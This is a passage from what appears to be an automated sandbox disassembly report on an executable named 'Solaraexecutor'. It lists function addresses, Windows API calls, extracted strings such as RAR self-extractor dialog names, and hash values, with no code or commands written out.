_free.LIBCMT ref: 00D4975E
_free.LIBCMT ref: 00D4976C

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8864f281e5298fdb9165111b38c4faae473cd9b186d36c8d353693d9ddad2b2b
Instruction ID: 9e8f7c2121774dae69ac7916f024d0bf658052f362a2fcc48dbec0a5722b7b20
Opcode Fuzzy Hash: 8864f281e5298fdb9165111b38c4faae473cd9b186d36c8d353693d9ddad2b2b
Instruction Fuzzy Hash: E311A476911109AFCB01EF95C842CDD3BB5EF14390B5154A1FA088F262DF32DA50AFA4

Function 00D42E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00D42F50
___TypeMatch.LIBVCRUNTIME ref: 00D4305E
_UnwindNestedFrames.LIBCMT ref: 00D431B0
CallUnexpected.LIBVCRUNTIME ref: 00D431CB
_abort.LIBCMT ref: 00D431D0

Strings

csm, xrefs: 00D42E6E
csm, xrefs: 00D42F87
csm, xrefs: 00D42EDB

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 44f43697a997d1515a675881d079e539aef7cd8a69a36eb5600aed5b81581c45
Instruction ID: 06a7b4bd930d591e53affe15e30631780a5083d84c3b40ab0e7d47f49685b40f
Opcode Fuzzy Hash: 44f43697a997d1515a675881d079e539aef7cd8a69a36eb5600aed5b81581c45
Instruction Fuzzy Hash: 84B14671900209EFCF29DFA8C8819AEBBB5FF14310F58415AF8156B212D731EA55CBB1

Function 00D26FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D26FAA
_wcslen.LIBCMT ref: 00D27013
_wcslen.LIBCMT ref: 00D27084

Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00D26FCC
UNC\, xrefs: 00D27051
\??\, xrefs: 00D2702B
SeRestorePrivilege, xrefs: 00D26FC2

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 8a4ee2fc9f1ddd242aa8dcccd285d30790e6dd58af9810de212e8a81588e69b1
Instruction ID: 6dc5e9d9d96bc9a9b728c60ecd72309945ddfe6fee6b8f844fcd81bde87da99a
Opcode Fuzzy Hash: 8a4ee2fc9f1ddd242aa8dcccd285d30790e6dd58af9810de212e8a81588e69b1
Instruction Fuzzy Hash: 4A4136B1D08364BAEF31E774AC42FEE776CDF28348F040455FA56A6182D670AA488731

Function 00D3B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370

EndDialog.USER32(?,00000001), ref: 00D3B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D3B650
SetWindowTextW.USER32(?,?), ref: 00D3B661
GetDlgItem.USER32(?,00000065), ref: 00D3B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D3B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D3B694

Strings

LICENSEDLG, xrefs: 00D3B5D4

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 22afea95d4cbb3fb9542277e45877ae3466ef11d01dd5a8adc9d28031e6ad145
Instruction ID: f97e42e284ce2e7f9ccbebfdb0a181338ba057588e7a782a929552536b3cbeb0
Opcode Fuzzy Hash: 22afea95d4cbb3fb9542277e45877ae3466ef11d01dd5a8adc9d28031e6ad145
Instruction Fuzzy Hash: 4421E532214304BBD2219F65EC4AF3B3B6DEB46F61F050015F748EA2E1DB529901D731

Function 00D3FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,3A1A99F3,00000001,00000000,00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE14
SysAllocString.OLEAUT32(00000000), ref: 00D3FE1F
_com_issue_error.COMSUPP ref: 00D3FE48
_com_issue_error.COMSUPP ref: 00D3FE52
GetLastError.KERNEL32(80070057,3A1A99F3,00000001,00000000,00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE57
_com_issue_error.COMSUPP ref: 00D3FE6A
GetLastError.KERNEL32(00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE80
_com_issue_error.COMSUPP ref: 00D3FE93

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: aca8028672310d8f02fb17ea2dfa1bb529394c785de54e987f1dd48ffde0066b
Instruction ID: d293a8dcdf23712717715aec80590fd059a2cf7a9d1bf8f5695f9d76ffdcc52e
Opcode Fuzzy Hash: aca8028672310d8f02fb17ea2dfa1bb529394c785de54e987f1dd48ffde0066b
Instruction Fuzzy Hash: 4E41D571E0031DAFCB109F68DC45BAFBBA8EB48751F14423AF905E72A1DB3499008BB5

Function 00D2AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D2AF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00D2AFCA
Windows 10, xrefs: 00D2B0C2
Name, xrefs: 00D2B0B0
WQL, xrefs: 00D2AFDC
ROOT\CIMV2, xrefs: 00D2AF5C

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 99b74f3360ee4c1c5a32ed4d802bb5351645ccc85f28ac1b3c7d2fcfe715d80b
Instruction ID: d141eb74d3447b4a3642737f7b0f73c879ff546e630142ccbf48ca0961b47bb0
Opcode Fuzzy Hash: 99b74f3360ee4c1c5a32ed4d802bb5351645ccc85f28ac1b3c7d2fcfe715d80b
Instruction Fuzzy Hash: 21716A70A00729AFDB15DFA8D8959AEBBB8FF49755B040159F912E72A0CB30AD05CB70

Function 00D29382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D29387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D293AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D293C9

Part of subcall function 00D2C29A: _wcslen.LIBCMT ref: 00D2C2A2

Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1

_swprintf.LIBCMT ref: 00D29465

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

MoveFileW.KERNEL32(?,?), ref: 00D294D4
MoveFileW.KERNEL32(?,?), ref: 00D29514

Strings

rtmp%d, xrefs: 00D2944E

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: e4a677e46a93a9a9fff2159250645a233ddb5866eaa22f765e086f719687aa48
Instruction ID: 0a913e9454f0663aa7ebc3eafe72a189ccbd3f6801d6506e7275114b94321c29
Opcode Fuzzy Hash: e4a677e46a93a9a9fff2159250645a233ddb5866eaa22f765e086f719687aa48
Instruction Fuzzy Hash: 69419871900274A6CF21EFA0EC65EDEB37CEF65384F0448A5B649E3151DB388B898B74

Function 00D31218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D3122E

Part of subcall function 00D2B146: GetVersionExW.KERNEL32(?), ref: 00D2B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D31251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D31263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D31274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D312CF
__aullrem.LIBCMT ref: 00D31379

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 7b9a21b3a5a7e7bc5420bec7332b8b57200562ccb440ae78d9e8586991a3d3a3
Instruction ID: 72c649efba07ead24f6345650629a91f58049e2b39b28606377032390020fd8c
Opcode Fuzzy Hash: 7b9a21b3a5a7e7bc5420bec7332b8b57200562ccb440ae78d9e8586991a3d3a3
Instruction Fuzzy Hash: 464106B5508306AFC710DF65C88496BBBF9FF88355F04892EF996C2210E734E659CB62

Function 00D22210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D22536

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0

Strings

;%u, xrefs: 00D22523
xc%u, xrefs: 00D2275A
x%u, xrefs: 00D226FD

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 8c3325b207096f1c7aa7d7d03dcadcc280c41f12872d1699b98f7ada80abc5af
Instruction ID: 65c71ea2f0a77f2dd6325615330f97037bd68f2f6e69a409b64062edfe1972b3
Opcode Fuzzy Hash: 8c3325b207096f1c7aa7d7d03dcadcc280c41f12872d1699b98f7ada80abc5af
Instruction Fuzzy Hash: B9F12871604360ABCB25EB28A495BBE7795AFB4308F08056DFCC69B283CB64C945C772

Function 00D39CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D39D0A

Strings

<br>, xrefs: 00D39DFE
</style>, xrefs: 00D39E52
<style>, xrefs: 00D39E30
</p>, xrefs: 00D39DE8
>, xrefs: 00D39D4B

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 73be03d4aa3775547ae2cdf8c2b48b2b9269b212f55a7bef68944cb07c557e9b
Instruction ID: e99742f9b971ff436808466dfac3463efb627fc82099cbb1c2e5a9273523eb88
Opcode Fuzzy Hash: 73be03d4aa3775547ae2cdf8c2b48b2b9269b212f55a7bef68944cb07c557e9b
Instruction Fuzzy Hash: C651D66664632395DB30AA29AC32776F3E0DFA1751F6D042AFDC19B1C0FBE58D818271

Function 00D4F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D4FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D4F6CF
__fassign.LIBCMT ref: 00D4F74A
__fassign.LIBCMT ref: 00D4F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D4F78B
WriteFile.KERNEL32(?,00000000,00000000,00D4FE02,00000000,?,?,?,?,?,?,?,?,?,00D4FE02,00000000), ref: 00D4F7AA
WriteFile.KERNEL32(?,00000000,00000001,00D4FE02,00000000,?,?,?,?,?,?,?,?,?,00D4FE02,00000000), ref: 00D4F7E3

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3f030f2df00697338c6e562abf6251250a89a3a3f71d4ae0bd321c72f375728b
Instruction ID: 6194cedc27cd640aba32c7fdf320935c95a7512fed71d463c643db511685d7b9
Opcode Fuzzy Hash: 3f030f2df00697338c6e562abf6251250a89a3a3f71d4ae0bd321c72f375728b
Instruction Fuzzy Hash: FD5153B1D003499FDB10CFA8DC85AEEBBF4EF09310F15416AE955E72A1D670AA41CBB0

Function 00D42900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D42937
___except_validate_context_record.LIBVCRUNTIME ref: 00D4293F
_ValidateLocalCookies.LIBCMT ref: 00D429C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00D429F3
_ValidateLocalCookies.LIBCMT ref: 00D42A48

Strings

csm, xrefs: 00D429DD

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: feb364b126849a136c2fa12234f0a4b9b6400ec57b0b0131f40aaf1e1b3b5860
Instruction ID: 411db2a924b067ec2882da0bfe9545bd28ea38796b68cb599705a1c803e5f0ff
Opcode Fuzzy Hash: feb364b126849a136c2fa12234f0a4b9b6400ec57b0b0131f40aaf1e1b3b5860
Instruction Fuzzy Hash: 0B41AF30A00248AFCF10DF69C885AAEBBA5EF44324F588155FC15AB392D731DA05CFB0

Function 00D39ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00D39EEE
GetWindowRect.USER32(?,00000000), ref: 00D39F44
ShowWindow.USER32(?,00000005,00000000), ref: 00D39FDB
SetWindowTextW.USER32(?,00000000), ref: 00D39FE3
ShowWindow.USER32(00000000,00000005), ref: 00D39FF9

Strings

RarHtmlClassName, xrefs: 00D39FA5

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 9997750b1c57fc16169ab585219f7807330cb623245f9feed5e85b35491393d6
Instruction ID: 03427fa8a55fd8a9d616b359d64041cc6ee68e6f396e2352a040b84686900381
Opcode Fuzzy Hash: 9997750b1c57fc16169ab585219f7807330cb623245f9feed5e85b35491393d6
Instruction Fuzzy Hash: 7F419032104310AFDB219F68DC8CB6BBBA8FF48B11F044559F9499A256DB74D918CB71

Function 00D39955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D3995E
_wcslen.LIBCMT ref: 00D39993

Strings

<br>, xrefs: 00D399DF
 , xrefs: 00D39A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00D39987
, xrefs: 00D399B0

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: c68a4f8de696cb5f5e74154c9a7713bd43aedde2ae395b5552bb97bab27701a6
Instruction ID: 32e6132d4d6dd38ce7260eecd18e32869577a53394bb84ddb6742636bca94e45
Opcode Fuzzy Hash: c68a4f8de696cb5f5e74154c9a7713bd43aedde2ae395b5552bb97bab27701a6
Instruction Fuzzy Hash: 80314D3264434556DA34AB549C52B7BF3E4EB90720F64462FF98657280FBE0ED8583B2

Function 00D4C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D4C868: _free.LIBCMT ref: 00D4C891

_free.LIBCMT ref: 00D4C8F2

Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4

_free.LIBCMT ref: 00D4C8FD
_free.LIBCMT ref: 00D4C908
_free.LIBCMT ref: 00D4C95C
_free.LIBCMT ref: 00D4C967
_free.LIBCMT ref: 00D4C972
_free.LIBCMT ref: 00D4C97D

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: a681dae2b2ab401840cae1c059b0018f4e0512a798e44d27c664d601d5887549
